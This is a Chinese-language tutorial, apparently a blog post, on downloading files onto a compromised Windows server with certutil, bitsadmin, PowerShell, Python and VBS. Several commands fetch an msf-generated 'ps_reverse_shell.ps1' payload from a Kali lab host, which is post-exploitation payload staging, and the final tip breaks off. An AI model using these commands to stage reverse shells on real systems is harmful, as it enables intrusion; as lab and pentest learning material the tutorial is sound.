文章目录
- 一、目的
- 二、环境
- 三、使用命令
- 3.1 certutil
- 3.2 bitsadmin
- 3.3 powershell
- 3.4 Python
- 3.5 VBS脚本
一、目的
拿到一台Windows主机,需要远程web站点上的文件到本地,可以参考以下方法!
二、环境
提供HTTP服务站点:
- Kali:192.168.253.129 (kali搭建http服务,以msf生成的powershell payload为测试目标)
下载文件的Windows Server服务器
| OS名称 |
|---|
| Windows Server 2008 R2 Datacenter |
| Windows Server 2012 R2 Datacenter |
三、使用命令
3.1 certutil
命令限制:适用于Server 2003以上版本,以及Windows Server 2003 / 2003 R2,带有SP1/SP2的Windows Server 2003
certutil -urlcache -split -f <站点文件路径>
3.2 bitsadmin
Tips:个别系统上拒绝访问添加文件,具体情况真实环境下自行测试
bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.253.129/ps_reverse_shell.ps1" "c:\ps_reverse_shell.ps1"
3.3 powershell
# 进入powershell
powershell
# 执行
powershell (new-object Net.WebClient).DownloadFile('http://192.168.253.129/ps_reverse_shell.ps1','C:\ps_reverse_shell.ps1')
3.4 Python
(如果目标系统中有python,可以使用此方法,urlopen中是要下载的地址,open后是要保存的文件名称,不指定路径就是当前路径)
#!/usr/bin/python
import urllib2
u = urllib2.urlopen('http://10.32.22.238/index.html')
localFile = open('index.html', 'w')
localFile.write(u.read())
localFile.close()
注意shell权限问题,否则open不到本地
3.5 VBS脚本
优点:兼容性强,windows都支持VBS脚本
缺点: 字符太多,不方便准备vbs文件
(下方URL地址需要更改,保存文件的地址需要更改,注意文件后缀需要和下载的一致)
Set args = Wscript.Arguments
Url = "http://10.32.22.238/index.html"
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", Url, False
xHttp.Send
with bStrm
.type = 1 '
.open
.write xHttp.responseBody
.savetofile "C:\Users\KevinMahone\1.html", 2 '
end with
Tips:如果在命令行下运行:(temp.vbs是上方的脚本文件)
更多推荐
Windows本地下载远程服务器文件方法总结
发布评论